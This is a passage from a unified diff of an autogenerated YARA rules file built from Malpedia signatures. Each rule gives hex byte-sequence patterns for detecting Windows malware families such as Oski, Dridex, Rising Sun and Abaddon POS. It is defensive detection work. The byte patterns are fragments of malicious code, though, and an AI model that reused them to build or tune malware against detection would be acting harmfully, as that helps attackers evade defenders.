"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.akira_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oski_auto.yar#L1-L187" license_url = "N/A" - logic_hash = "c1ae7dbc4a382b6e7a49f30242c48e32f0bd119ae1ed5e26b8c812d114457836" + logic_hash = "32e88579dcf8b669972c260572f27190a2af2a9bf4eb835092b7f8cb9a6a6e17" score = 75 quality = 75 tags = "FILE" @@ -138581,32 +141329,39 @@ rule MALPEDIA_Win_Akira_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b01 85c0 7e18 ffc8 8901 498b4840 488b11 } - $sequence_1 = { 418bc9 83c902 41f6c108 410f44c9 81e13bffffff 390d???????? 741d } - $sequence_2 = { 90 488b4b60 48894c2430 4885c9 7445 488b5370 4889542440 } - $sequence_3 = { 7cee 488bcb 488b5c2430 4883c420 5f e9???????? 0fb6043b } - $sequence_4 = { ff5208 90 488b4b60 48894c2430 4885c9 7445 488b5370 } - $sequence_5 = { e8???????? 488975d0 488b4dd8 488975d8 48894808 0f1045e0 0f114010 } - $sequence_6 = { 4488443c6e 48ffc7 4883ff0a 72ac 0f57c0 0f118590020000 0f57c9 } - $sequence_7 = { 740a e8???????? 488bd8 eb03 498bdd 49897e18 } - $sequence_8 = { e8???????? 33f6 41897578 49397568 744d 488b0f 40387128 } - $sequence_9 = { c645bf01 4883ef01 75b4 0f2845bf 33ff 4c8d75cf 48837de710 } + $sequence_0 = { 50 a1???????? 50 8d8df0feffff 51 e8???????? } + $sequence_1 = { 25ff7f0000 c3 8bff 55 8bec 83ec14 ff7510 } + $sequence_2 = { e8???????? 83c40c e8???????? 50 a1???????? 50 } + $sequence_3 = { 8975f0 e8???????? cc 8bff 55 8bec 8b550c } + $sequence_4 = { 7408 39b5acfeffff 7787 6803010000 8d95edfeffff 56 } + $sequence_5 = { 83431810 66898568fbffff 8b4314 85c0 7577 8b8d84fbffff 51 } + $sequence_6 = { 6a00 6a1a 6a00 8985eceeffff 898df0eeffff } + $sequence_7 = { 53 68???????? 8d8de4feffff 51 53 } + $sequence_8 = { e8???????? 83c404 56 8d85ecfeffff 50 8d8dd0fcffff } + $sequence_9 = { f3c3 e9???????? 8bff 55 8bec 83ec1c a1???????? } + $sequence_10 = { e8???????? 83c404 8b0d???????? 51 ff15???????? a3???????? 833d????????00 } + $sequence_11 = { 8b5508 52 a1???????? 50 8d8de8fdffff } + $sequence_12 = { 83c404 8b55f8 8955f4 8b45f4 50 e8???????? } + $sequence_13 = { 50 8d4df8 51 6800020000 8b55f4 52 ff15???????? } + $sequence_14 = { 6a00 e8???????? 83c40c 8985e4fdffff } + $sequence_15 = { 8d55f4 52 6a00 68???????? ff15???????? 8945f0 } + $sequence_16 = { 83c220 52 6a00 6a00 ff15???????? } condition: - 7 of them and filesize <1286144 + 7 of them and filesize <423936 } -rule MALPEDIA_Win_Wininetloader_Auto : FILE +rule MALPEDIA_Win_Rising_Sun_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1f5f1063-d131-51ec-8fa2-72e334bf0ad8" + id = "61449700-41c3-5e72-bc5d-1e423597afa4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wininetloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wininetloader_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rising_sun_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "18fd24bb687ec61c125dfaa2108b7d0deaa39d2f9fd1538d0119b221d934fb42" + logic_hash = "76c0e1eaf3dacaaaa1a31e893606959ffd6d8a46f21e1d7c2864ee68d388c2cb" score = 75 quality = 75 tags = "FILE" @@ -138620,32 +141375,32 @@ rule MALPEDIA_Win_Wininetloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7510 0fb611 0fb6c2 80fa28 7423 80fa29 741e } - $sequence_1 = { 4c8bac2480000000 90 493bdf 74db 0fb633 498bcd 410fb61424 } - $sequence_2 = { 48897c2460 4d8bc5 488b542438 488bc8 e8???????? 4b8d042e 4889442458 } - $sequence_3 = { 90 488d5508 48837d2008 480f435508 488b4518 4c8d0c42 4c8d4508 } - $sequence_4 = { e8???????? 3a03 7516 488bcf e8???????? 4c8b45f8 488b4df0 } - $sequence_5 = { 4c8be0 4889442450 4885db 7427 488b03 488bcb 488b4010 } - $sequence_6 = { 4c894d08 33db 448bf3 895c2470 49395910 752b 488d15b6ea1100 } - $sequence_7 = { 3a8c2ab8a80e00 0f8585000000 488b03 48ffc2 8a08 48ffc0 488903 } - $sequence_8 = { 488d1d48970500 807e5704 7704 488b5e48 48ffc7 803c3b00 75f7 } - $sequence_9 = { eb21 48c74424200f000000 4c8d0d54fd0900 4533c0 418d500f 488d4c2430 e8???????? } + $sequence_0 = { c745b03414d384 c745b418f4ff64 c745b851d4c644 c745bcabb43c24 c745c099945804 c745c4c4746ce4 c745c8dd544ec4 } + $sequence_1 = { 4889742418 48897c2420 55 488dac24a0e4ffff b8601c0000 } + $sequence_2 = { c745dcd3515290 c745e00358c000 c745e4c80ae51e c745e804d34ed7 c745ec3e3054ad c745f046c2e664 c745f418a189fe } + $sequence_3 = { c785100200000358c000 c78514020000c80ae51e c7851802000004d34ed7 c7851c0200003e3054ad c7852002000046c2e664 } + $sequence_4 = { e8???????? 48898588000000 488d05c298feff 4883c420 } + $sequence_5 = { c78514020000c80ae51e c7851802000004d34ed7 c7851c0200003e3054ad c7852002000046c2e664 c7852402000018a189fe c7852802000003f29cea c7852c0200000bbce179 } + $sequence_6 = { c785440600001def57f7 c785480600003bf5679d c7854c0600000989ec8d c78550060000fd9e1cf3 66c785540600002657 664489ad60060000 e8???????? } + $sequence_7 = { 4c8d41ff 488bce e8???????? 488b542450 b89fffffff } + $sequence_8 = { 660f1f440000 0fb602 48ffc2 88440aff 84c0 75f2 } + $sequence_9 = { e8???????? cc 48895c2408 48896c2418 56 57 4154 } condition: - 7 of them and filesize <2659328 + 7 of them and filesize <409600 } -rule MALPEDIA_Win_Iisniff_Auto : FILE +rule MALPEDIA_Win_Gearshift_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4d48d0b9-4608-5fda-9d9c-52fef07b4d04" + id = "02540c00-8de2-5ac5-936a-14a6336e7666" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.iisniff_auto.yar#L1-L161" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gearshift_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "eea8ed3537fc508bcc20c7dcdf7a5fa6fb525fac16191889baa1f35692f7bc88" + logic_hash = "1c8a80ba14390df1b7bcd5e4b955652a287b76aebf22d78fc43b89631a984860" score = 75 quality = 75 tags = "FILE" @@ -138659,39 +141414,34 @@ rule MALPEDIA_Win_Iisniff_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7513 8b442414 8b4804 53 } - $sequence_1 = { 8b8c240c000100 56 8d842414000100 50 51 } - $sequence_2 = { 7507 be04000000 eb69 c645fc01 8b0f } - $sequence_3 = { 55 56 8bb42488000000 57 33db } - $sequence_4 = { 83d8ff 85c0 7537 8dbc24a4000000 e8???????? } - $sequence_5 = { 5f 5b c20400 8b4038 8b08 890e } - $sequence_6 = { 8b45cc ff704c e8???????? 59 83f8ff 0f852cffffff } - $sequence_7 = { 56 8d4dd4 894598 e8???????? 8365fc00 56 8d4d9c } - $sequence_8 = { 895c241c 89442420 e8???????? 8bf0 } - $sequence_9 = { e8???????? 83c404 8d8c24fc000000 899c2448010000 89bc2444010000 } - $sequence_10 = { 6a03 68000000c0 68???????? ff15???????? 6a02 } - $sequence_11 = { e8???????? 8b4f3c 8b11 8d75c8 56 ff75cc } - $sequence_12 = { ff75e8 e8???????? 834dfcff 8b45dc } - $sequence_13 = { c3 ff7508 e8???????? 59 c3 833d????????00 7505 } - $sequence_14 = { 64a300000000 80bc24a400000000 7409 6a00 6a00 e8???????? 8b410c } + $sequence_0 = { 4881c4c0000000 5f c3 85c0 0f85a9000000 } + $sequence_1 = { 4d8bde 4d2b5d30 0f84a1000000 488b4500 488b5d08 } + $sequence_2 = { 4883ec28 48833d????????00 740a b801000000 4883c428 c3 488d0dc9a80000 } + $sequence_3 = { 4823f1 66413b7806 0f83ce000000 48895c2448 4c89642450 4c8d25566a0300 4a8d5c003c } + $sequence_4 = { 83c8ff e9???????? 4c8bfb 4c8be3 488d05363c0300 49c1fc05 } + $sequence_5 = { 4885c0 0f8418010000 4c8d442470 41b910010000 488bd0 488bcb 48897c2420 } + $sequence_6 = { 488bd8 ff9688000000 4c8bc3 33d2 488bc8 8947f8 ff96a8000000 } + $sequence_7 = { 7522 48ffc1 498d0408 493bc3 7cec 4963c2 4803c6 } + $sequence_8 = { 4533c0 33d2 498bcc 44896c2428 48897c2420 ff15???????? ba01000000 } + $sequence_9 = { 0fb7d1 eb09 488b4508 488d540102 } condition: - 7 of them and filesize <1441792 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Powerloader_Auto : FILE +rule MALPEDIA_Win_Dridex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7f4f5f46-fc37-546a-a6e8-709a0ba38743" + id = "fd4d4346-8d83-5613-888d-88569f1753b9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powerloader_auto.yar#L1-L108" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dridex_auto.yar#L1-L1066" license_url = "N/A" - logic_hash = "793f3dbd327274c0d84943d43e404acbb8cb72be0435ee1a3f9e0ada37088a0f" + logic_hash = "7f3078493ad3e901d3230994f499bb2b8f95c8666fe5cee6d8f3649c308a4e21" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -138703,32 +141453,151 @@ rule MALPEDIA_Win_Powerloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? eb22 33c9 66666666660f1f840000000000 0fb6840c30010000 } - $sequence_1 = { 8bf2 32db e8???????? 3bc7 7349 } - $sequence_2 = { e8???????? 0fb6d8 84c0 7514 } - $sequence_3 = { e8???????? 0fb6d8 84c0 7514 ff15???????? } - $sequence_4 = { 33d2 c605????????00 e8???????? 0fb6c3 } - $sequence_5 = { 32db e8???????? 3bc7 7349 } - $sequence_6 = { e8???????? eb22 33c9 66666666660f1f840000000000 } - $sequence_7 = { e8???????? 8b7c2430 85ed 740d } - $sequence_8 = { ff15???????? 83f81f 7323 ff15???????? } - $sequence_9 = { ff15???????? 83f803 7405 83f802 7530 } + $sequence_0 = { ffd6 85c0 7512 e8???????? eb03 } + $sequence_1 = { e8???????? b910270000 e8???????? e8???????? } + $sequence_2 = { c605????????01 c3 c605????????00 c3 } + $sequence_3 = { 83f8ff 7505 e8???????? 3d34270000 } + $sequence_4 = { ffd0 85c0 751f e8???????? } + $sequence_5 = { ffd0 e8???????? 85c0 74de } + $sequence_6 = { 53 53 53 6a01 53 ffd0 } + $sequence_7 = { eb0a e8???????? eb03 6a7f 58 } + $sequence_8 = { c3 31c0 c3 50 } + $sequence_9 = { 7406 42 803a00 75fa } + $sequence_10 = { 7403 56 ffd0 33f6 } + $sequence_11 = { e8???????? 85c0 7407 56 ffd0 } + $sequence_12 = { 807c241400 7409 8d4c2410 e8???????? } + $sequence_13 = { e8???????? 6880000000 53 53 } + $sequence_14 = { e8???????? 85c0 7408 6a00 ffd0 } + $sequence_15 = { e8???????? 6a00 8d4e1c e8???????? } + $sequence_16 = { e8???????? eb0a b9d0070000 e8???????? } + $sequence_17 = { ffd0 5b c3 33c0 } + $sequence_18 = { c70350000000 eb0d 3da665f63e 7506 } + $sequence_19 = { e8???????? 85c0 7404 6a7f } + $sequence_20 = { 85c0 7407 685a040000 ffd0 } + $sequence_21 = { e8???????? 3db20d7897 7508 c70350000000 } + $sequence_22 = { 8bc8 e8???????? 6a70 8bc8 e8???????? 6a73 8bc8 } + $sequence_23 = { 50 e8???????? 8938 8b35???????? } + $sequence_24 = { 6a00 6a00 8d4dfc 51 6aff } + $sequence_25 = { e8???????? 6a74 8bc8 e8???????? 6a74 8bc8 } + $sequence_26 = { 6810270000 50 e8???????? 83c410 } + $sequence_27 = { 7411 c7461003000000 e8???????? 894614 } + $sequence_28 = { 85c0 7415 6a01 6a00 6a00 } + $sequence_29 = { 6a00 8bcf e8???????? 50 ffd6 } + $sequence_30 = { eb08 83ca20 eb03 83ca10 } + $sequence_31 = { 46 e8???????? c1e802 3bf0 } + $sequence_32 = { e8???????? e9???????? 807c245000 740a } + $sequence_33 = { e8???????? 8d4dc4 e8???????? 5e } + $sequence_34 = { 6802100000 68ffff0000 ff36 ffd0 } + $sequence_35 = { ffd0 85c0 7510 e8???????? } + $sequence_36 = { c20400 55 8bec 83ec34 8365fc00 } + $sequence_37 = { 89442404 eb00 8b442404 89c1 89ca } + $sequence_38 = { 7414 31c0 89c1 8b442424 88c2 8854240f } + $sequence_39 = { 8b442428 6689c1 66894c2458 66894c245a } + $sequence_40 = { 8a442427 a801 7534 eb00 31c0 89c1 } + $sequence_41 = { 6a64 59 e8???????? 33c9 e8???????? } + $sequence_42 = { 51 6801100000 68ffff0000 ff36 } + $sequence_43 = { 7406 6a02 ff36 ffd0 } + $sequence_44 = { 740d 40 83c104 3d00100000 } + $sequence_45 = { 885c2407 89442408 7598 8a442407 a801 } + $sequence_46 = { c7461002000000 eb0f c7461003000000 e8???????? } + $sequence_47 = { 890424 894c2404 75dd 8b0424 } + $sequence_48 = { e8???????? 50 56 8bcb e8???????? 50 e8???????? } + $sequence_49 = { 8954242c 8b44242c 89c1 89ca } + $sequence_50 = { eb0a b988130000 e8???????? 33d2 } + $sequence_51 = { 740a 488d4c2448 e8???????? 488d4c2430 e8???????? e9???????? } + $sequence_52 = { e8???????? 84c0 740f 6a05 } + $sequence_53 = { e8???????? 8be8 85ed 7458 } + $sequence_54 = { e8???????? 6880000000 55 55 } + $sequence_55 = { ff7508 ffd0 33c0 40 5d } + $sequence_56 = { c3 55 8bec 837d0800 7422 } + $sequence_57 = { 8d4de0 51 68???????? ffd0 } + $sequence_58 = { 6a73 e8???????? 833f00 7523 } + $sequence_59 = { 6a00 6a02 ffd0 50 } + $sequence_60 = { e8???????? 8bc8 a1???????? ff30 } + $sequence_61 = { 5e c3 31c0 89c2 } + $sequence_62 = { e8???????? 50 ffd7 85c0 7512 } + $sequence_63 = { eb0c e8???????? 8bf0 eb03 6a7f 5e } + $sequence_64 = { 8b45cc 31c9 8b55d0 39c2 } + $sequence_65 = { 8038e9 89c1 8945d0 894dcc } + $sequence_66 = { e8???????? 50 53 8d4dd0 e8???????? 50 } + $sequence_67 = { 8b45e8 05ffff0000 25ffff0000 83c001 } + $sequence_68 = { 8b4de8 81c1ffff0000 81e1ffff0000 83c101 } + $sequence_69 = { 50 8b442408 8038e9 890424 7517 8b0424 8b4801 } + $sequence_70 = { 8b704c 2b7134 891424 89742404 894c2418 e8???????? } + $sequence_71 = { 8b55bc 8955c4 776a 31c0 8b4dac 8b510c } + $sequence_72 = { 807c0805e9 891424 74e9 8b0424 } + $sequence_73 = { 8b450c 8b4d08 8b503c 6689d6 6683fe00 89c7 8945f0 } + $sequence_74 = { 83c001 8b4de8 01c1 894de0 } + $sequence_75 = { 7517 8b0424 8b4801 89c2 01ca 83c205 } + $sequence_76 = { 8b513c 6689d6 6683fe00 89cf 8945f0 894dec } + $sequence_77 = { 01ca 83c205 807c0805e9 891424 } + $sequence_78 = { 89c7 8945f0 894dec 8955e8 897de4 } + $sequence_79 = { 5b 5e 5d c3 55 89e5 6a00 } + $sequence_80 = { 83c001 8b4df8 01c1 894df0 8b45f0 } + $sequence_81 = { 83c454 5b 5e 5f 5d c3 55 } + $sequence_82 = { 894df0 8b45f0 83c40c 5e } + $sequence_83 = { e9???????? 8b45e0 83c438 5f } + $sequence_84 = { 8945f8 894df4 8975f0 7418 8b45f4 05ffff0000 } + $sequence_85 = { 25ffff0000 83c001 8b4da8 01c1 } + $sequence_86 = { 8945c4 894dc0 885dbf 8975b8 } + $sequence_87 = { c3 55 89e5 57 56 53 83ec54 } + $sequence_88 = { 5b 5d c3 8b45d0 8b4dd4 668b55d8 31f6 } + $sequence_89 = { 8b45e0 83c45c 5f 5b 5e 5d } + $sequence_90 = { 53 56 83ec38 8b450c 8b4d08 } + $sequence_91 = { c7424800b00400 8b7c2418 c787cc00000000000000 c787c800000000000000 } + $sequence_92 = { 8955cc 74bc 8b45cc 83c454 5b 5e } + $sequence_93 = { 6a00 e8???????? 83c408 c3 6a00 68???????? } + $sequence_94 = { 8d442448 b91c000000 8b542438 891424 89442404 c74424081c000000 894c2434 } + $sequence_95 = { 893c24 89442404 c744240804000000 8954240c 89ac248c000000 898c2488000000 } + $sequence_96 = { 8945c8 75e4 83c448 5e 5f 5b 5d } + $sequence_97 = { 53 83ec74 8b450c 8b4d08 31d2 8b713c } + $sequence_98 = { 0f85dafeffff 8b45e4 83c474 5b } + $sequence_99 = { 55 89e5 56 57 53 83ec70 } + $sequence_100 = { 53 81ecb0000000 8b4508 8d4dd8 c745d800000000 } + $sequence_101 = { 5b 5d c3 8b45f0 8b0c8504406e00 8b55f8 39d1 } + $sequence_102 = { 8b0c8504406e00 8b55f8 39d1 8945ec 894de8 7212 } + $sequence_103 = { 83f900 89442464 0f84f2010000 b801000000 8b4c2468 8b91a4000000 } + $sequence_104 = { 83c470 5b 5f 5e 5d c3 } + $sequence_105 = { 8b45e0 83c438 5e 5b } + $sequence_106 = { 57 83ec20 8b4508 890424 } + $sequence_107 = { 890424 e8???????? 31c0 83c420 5f } + $sequence_108 = { c7424800c00400 8b7de4 c787cc00000000000000 c787c800000000000000 } + $sequence_109 = { 897dd8 8b45d8 83c444 5b 5e 5f } + $sequence_110 = { e8???????? 8d0d44306e00 31d2 8b75f8 89462c } + $sequence_111 = { 894620 890c24 c744240400000000 8955e0 e8???????? 8d0dd8306e00 890424 } + $sequence_112 = { 8d155e306e00 83ec04 891424 8945e8 894de4 } + $sequence_113 = { 8b55f4 8b75ec 89723c c7424004000000 c742442c0c0200 c7424800b00400 } + $sequence_114 = { 55 89e5 53 56 57 83ec38 8b450c } + $sequence_115 = { c742442c0c0200 c7424800b00400 8b7de4 c787cc00000000000000 } + $sequence_116 = { 8d0dbc306e00 890424 894c2404 e8???????? 8d0d44306e00 } + $sequence_117 = { 74bc 8b45cc 83c454 5f 5b 5e } + $sequence_118 = { 0f84e2feffff e9???????? 8b45e0 83c45c 5e 5f 5b } + $sequence_119 = { 56 53 57 83ec44 8b4508 } + $sequence_120 = { 8955e0 e8???????? 8d0dd8302700 890424 } + $sequence_121 = { 89462c 890c24 c744240400000000 8955d8 e8???????? 8d0d04318400 } + $sequence_122 = { c7424004000000 c7424499040200 c7424800c00400 8b7de4 } + $sequence_123 = { c3 55 89e5 83ec10 8b4508 8d0d44302500 } + $sequence_124 = { 56 83ec44 8b4508 8d0d30302500 31d2 890c24 } + $sequence_125 = { 31c0 8d0d5a232f00 8b55c8 39ca 8945cc 0f84f9000000 } + $sequence_126 = { 890c24 c744240400000000 8955e4 e8???????? 8d0dc9302f00 890424 894c2404 } + $sequence_127 = { 8d0d44302f00 31d2 8b75f8 894608 890c24 c744240400000000 } + $sequence_128 = { 8d0d30302700 31d2 890c24 c744240400000000 8945f0 8955ec e8???????? } condition: - 7 of them and filesize <155648 + 7 of them and filesize <1040384 } -rule MALPEDIA_Win_Mmon_Auto : FILE +rule MALPEDIA_Win_Cloudwizard_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "684efad9-d1d6-5ce6-b6e0-de65ea38db79" + id = "429d1e4e-ef3f-5d58-8bf0-a0b83d6be71f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mmon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mmon_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cloudwizard_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "fc9a1ffbaa9f24fc3223df86b9f3747f68822a1333ac4081d18094cd5050cf44" + logic_hash = "1171accd4a2881e0996da43d7ff173c5cb1938e75ca585c448a0136c0ce6d102" score = 75 quality = 75 tags = "FILE" @@ -138742,32 +141611,32 @@ rule MALPEDIA_Win_Mmon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d04f5c8474200 8938 68a00f0000 ff30 } - $sequence_1 = { 8d45cc 50 c745ccc8e64100 e8???????? 8b7508 } - $sequence_2 = { 3c58 770f 0fbec2 0fb68020094200 } - $sequence_3 = { 6aff 53 6a00 6a00 8bf1 } - $sequence_4 = { 891d???????? ff15???????? 85c0 7577 8b15???????? } - $sequence_5 = { 40 0080af4000a4 af 40 } - $sequence_6 = { 8b44241c 83c404 50 ff15???????? 6880969800 e8???????? } - $sequence_7 = { 03f9 8bda 83feff 7fa7 b867666666 f7ef c1fa02 } - $sequence_8 = { eb0a c7854cffffff00000000 b802000000 018554ffffff 018548ffffff 03f8 } - $sequence_9 = { 64a300000000 8b7d0c 8b07 68???????? 51 50 } + $sequence_0 = { c3 8d85d4fdffff 50 57 c785d4fdffff2c020000 e8???????? } + $sequence_1 = { 668945ee 58 6a7c 668945f0 58 6a6d } + $sequence_2 = { 8d45ec 663118 40 40 } + $sequence_3 = { 8bc8 8d8618060000 8d7802 668b18 40 40 6685db } + $sequence_4 = { ebd6 55 8bec 81ecb80e0000 } + $sequence_5 = { 6a01 897dfc 57 c706???????? 897e30 ff15???????? 894634 } + $sequence_6 = { 8d4530 d1f9 50 8d044e 50 e8???????? } + $sequence_7 = { 668945b8 8d45a0 663108 40 40 663918 } + $sequence_8 = { 40 6685d2 75f6 2bc1 8d8e18060000 } + $sequence_9 = { 6a5b 6689451e 58 6a5c 66894520 58 6a4d } condition: - 7 of them and filesize <356352 + 7 of them and filesize <134144 } -rule MALPEDIA_Win_Kerrdown_Auto : FILE +rule MALPEDIA_Win_Abaddon_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4e6c0456-511b-5ce5-b1ea-436b1b2f6672" + id = "8a8bfe7b-07a3-507a-8985-62178b8d7d5d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kerrdown_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.abaddon_pos_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "a33ff3dd3ba2b88105d1e9461a66c5947186b615b759549afa7c04ba76dcfedd" + logic_hash = "e2d8547af0d263d117f46abc9755b5a7e9f77ec4346ade26de1285350cf4f083" score = 75 quality = 75 tags = "FILE" @@ -138781,32 +141650,38 @@ rule MALPEDIA_Win_Kerrdown_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5d c20800 85f6 75b2 83ff10 8935???????? b8???????? } - $sequence_1 = { 8bec 8b0d???????? b8???????? 8b15???????? 57 8b3d???????? 83ff10 } - $sequence_2 = { 8aca c0e206 c0e902 80e10f 02c8 8a45eb 243f } - $sequence_3 = { b8???????? 0f43d1 b9???????? 2bc2 50 } - $sequence_4 = { 0f43c1 3d???????? 773e 83ff10 } - $sequence_5 = { 83ff10 ba???????? b8???????? 0f43d1 b9???????? 2bc2 } - $sequence_6 = { 80e10f 02c8 8a45eb 243f } - $sequence_7 = { ff750c 83ff10 ba???????? b8???????? 0f43d1 b9???????? 2bc2 } - $sequence_8 = { e8???????? 46 83fe03 7cec 8b4de0 } - $sequence_9 = { 0f854d0d0000 eb00 f30f7e442404 660f2815???????? 660f28c8 } + $sequence_0 = { 7402 eb27 8b8600010000 03860c010000 89867c010000 8b8684010000 } + $sequence_1 = { ba00000000 eb05 ba01000000 0186ac010000 } + $sequence_2 = { 80beb801000001 751b 80fa30 7205 80fa39 7605 80fa20 } + $sequence_3 = { 41 89c0 49 c7c100000000 ff15???????? 48 83c420 } + $sequence_4 = { 48 8986d0050000 48 83ec20 48 c7c100000000 } + $sequence_5 = { 89d8 69c080000000 3d002d0000 7602 eb22 } + $sequence_6 = { 7318 807c1e2c41 720c 807c1e2c5a } + $sequence_7 = { 81bea001000000dc0500 740c 81bea001000000d60600 7508 6a05 ff15???????? 8b86a0010000 } + $sequence_8 = { 31c9 31d2 80beb401000001 7505 } + $sequence_9 = { ffc3 ebd1 48 31db } + $sequence_10 = { 8986b0050000 48 83ec20 48 8b8eb0050000 48 } + $sequence_11 = { 0504d00700 48 8986c8050000 48 0504d00700 48 8986d0050000 } + $sequence_12 = { 83f800 7502 ebe4 50 ff15???????? 6a00 6a00 } + $sequence_13 = { 83c000 48 8b9eb8050000 48 8918 48 } + $sequence_14 = { 0500040000 3b19 730f 311418 } + $sequence_15 = { 720b 803939 7706 fe86a8010000 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Lowkey_Auto : FILE +rule MALPEDIA_Win_Kardonloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "16d4ae5f-e38d-570e-962d-91656915c4ac" + id = "3f6a3bad-df12-536d-9e36-cfe1dc9fa562" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lowkey_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kardonloader_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "663feed0bd96ec1d7d11defff75725aca17e4e2539133645562042d15d3f90de" + logic_hash = "4fe311b419f6bafe180c85c33e9d2d9d1da43b3315ab993943a70f218a823338" score = 75 quality = 75 tags = "FILE" @@ -138820,71 +141695,71 @@ rule MALPEDIA_Win_Lowkey_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 482be0 488b05???????? 4833c4 48898520200000 33d2 c74590636d642e } - $sequence_1 = { 488d3547ed0100 eb16 488b3b 4885ff 740a } - $sequence_2 = { 0f85d7feffff e9???????? b966000000 66894c2435 e9???????? 488d15fa230200 488d8d70010000 } - $sequence_3 = { b868000000 6689442435 eb49 488d1517250200 488d8d70010000 ff15???????? 85c0 } - $sequence_4 = { 4833c4 4889842490040000 8bfa 488bd9 4885c9 } - $sequence_5 = { 85c0 0f84bffeffff b865000000 895c2438 4c8d8570090000 6689442435 488d542430 } - $sequence_6 = { ff15???????? e9???????? b9d3000000 663bc1 7551 4c3935???????? 7414 } - $sequence_7 = { c3 4057 4883ec20 488d3d7b2d0100 48393d???????? 742b } - $sequence_8 = { 5e 5b c3 488bcb ff15???????? 4885c0 7504 } - $sequence_9 = { eb87 4055 53 57 488dac2470dfffff b890210000 } + $sequence_0 = { 83e13f c1e806 03c3 8a0490 88443702 8a0419 8b4d0c } + $sequence_1 = { 5e 8be5 5d c3 6a00 ff15???????? cc } + $sequence_2 = { e8???????? 83c438 85c0 7405 83c004 } + $sequence_3 = { 56 ff7508 68???????? e8???????? 85c0 0f8421010000 } + $sequence_4 = { 50 56 e8???????? 83c40c 894714 b001 5f } + $sequence_5 = { e8???????? 59 50 8d8550faffff 50 } + $sequence_6 = { 50 ff35???????? ff35???????? e8???????? 83c438 e9???????? 5f } + $sequence_7 = { 750b c74704???????? 0fb7720a 6a05 58 663bf0 750e } + $sequence_8 = { c0e204 8b45fc 880c30 0fb6441f02 8a8018314000 c0e802 } + $sequence_9 = { 50 8d85e4fdffff 50 8d85e8feffff 68???????? 50 } condition: - 7 of them and filesize <643072 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Unidentified_063_Auto : FILE +rule MALPEDIA_Win_Marap_Auto : FILE { meta: description = 